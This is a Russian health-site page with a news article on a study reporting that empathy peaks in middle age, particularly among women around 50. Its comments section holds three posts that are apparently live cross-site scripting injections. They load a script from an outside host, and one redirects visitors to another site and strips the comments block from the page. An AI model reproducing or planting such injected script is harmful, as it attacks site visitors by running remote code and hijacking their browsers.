Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Если вдруг стало грустно ...  >>  Если вдруг стало грустно – позвоните маме! Оказывается самые чуткие и понимающие – это женщины в 50-60 лет!
 
Обратная связь
 

Если вдруг стало грустно – позвоните маме! Оказывается самые чуткие и понимающие – это женщины в 50-60 лет!

Размер шрифта
21 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

По результатам недавнего исследования, в котором приняли участие 75 000 человек, женщины около 50 лет гораздо более склонны к сочувствию, чем другие группы населения.

женщины 50 лет более склонны к сочувствию

«В целом люди среднего возраста обоих полов показывают наибольшую способность к состраданию», – говорит  Сара Конрас, одна из авторов статьи о зависимости возраста и сочувствия, которая готовится к публикации в журнале по геронтологии. «Они эмоционально реагируют на чужие проблемы, а также с большим пониманием относятся к взглядам окружающих».

В рамках исследования ученые из США проанализировали информацию о способности к сочувствию у трех больших групп взрослого населения, а также обработали результаты общенационального анкетирования. Обнаружилось, что кривая зависимости сострадания от возраста представляет собой перевернутую букву «U». Пик кривой приходится на средний возраст. Возможно, это основано на том, что к среднему возрасту люди накапливают достаточный опыт, и их когнитивные возможности находятся на высоте. В то же время они еще недостаточно стары, когда возрастное снижение познавательных функций приводит к уменьшению эмоциональности.

Однако требуются дальнейшее изучение, чтобы установить, действительно ли такая зависимость является следствием возраста или это результат воспитания и условий жизни данного поколения. Люди, рожденные в 50-60-х годах (основные представители средневозрастной группы в данном исследовании), пережили множество социальных волнений, в результате чего они могли стать более понимающими и сострадающими.

Предыдущие исследования той же команды ученых показывают снижение готовности прийти на помощь и повышение чувства нарциссизма у молодого поколения по сравнению с предыдущими в том же возрасте. Сейчас ученые планируют выяснить, возможно ли повысить чувство сострадания у населения посредством СМИ. Сочувствие и его причины вызывают интерес науки, потому что оно побуждает людей заниматься такими необходимыми обществу делами, как благотворительность и волонтерство, не говоря уже о его важной функции в повседневной жизни.

Если вдруг стало грустно – позвоните маме! Она вас точно всегда поймет и утешит!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:16

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Три повода сохранить брак   Голос мужчины скажет, хочет он от вас детей или нет   Вы живете с неудачником? 6 причин, почему вы не можете уйти от него   У вас климакс. Как жить дальше?  
20 мая 2013Если вдруг стало грустно – позвоните маме! Оказывается самые чуткие и понимающие – это женщины в 50-60 лет! 17 мая 2013Пол вашего ребенка влияет на продолжительность жизни! Кого рожать, чтобы прожить дольше?
 
24 мая 2013Ученые сошли сума! Они доказали, что компьютерные игры стимулируют чтение! 14 мая 2013Высокая и стройная женщина – мужчины мечтают, женщины завидуют! Зря! Высокие и худые женщины – в группе риска по заболеваниям легких!
 

Слайдшоу

1
Мужчины. Как их понять?
5 причин быть женщиной
Что такое менопауза

Тесты

1
Что вы знаете о груди?
Что вы знаете о грудном вскармливании?
Заболеет ли ваша семья?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.